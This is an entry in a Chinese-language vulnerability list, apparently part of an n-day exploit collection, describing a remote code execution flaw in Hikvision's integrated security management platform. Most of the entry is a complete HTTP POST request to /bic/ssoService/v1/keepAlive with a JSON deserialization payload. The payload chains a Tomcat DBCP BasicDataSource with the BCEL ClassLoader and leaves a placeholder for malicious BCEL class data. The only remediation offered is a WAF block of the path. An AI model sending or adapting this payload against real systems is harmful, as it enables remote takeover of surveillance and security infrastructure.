vendor = "海康威视"
name = "海康威视综合安防管理平台 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/bic/ssoService/v1/keepAlive"
detail = "POST /bic/ssoService/v1/keepAlive HTTP/1.1 Host: Content-Type: application/json {\"CTGT\": {\"a\": {\"@type\": \"java.lang.Class\", \"val\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"}, \"b\": {\"@type\": \"java.lang.Class\", \"val\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"}, \"c\": {\"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\", \"driverClassLoader\": {\"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"}, \"driverClassName\": \"恶意BCEL数据\"}}}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
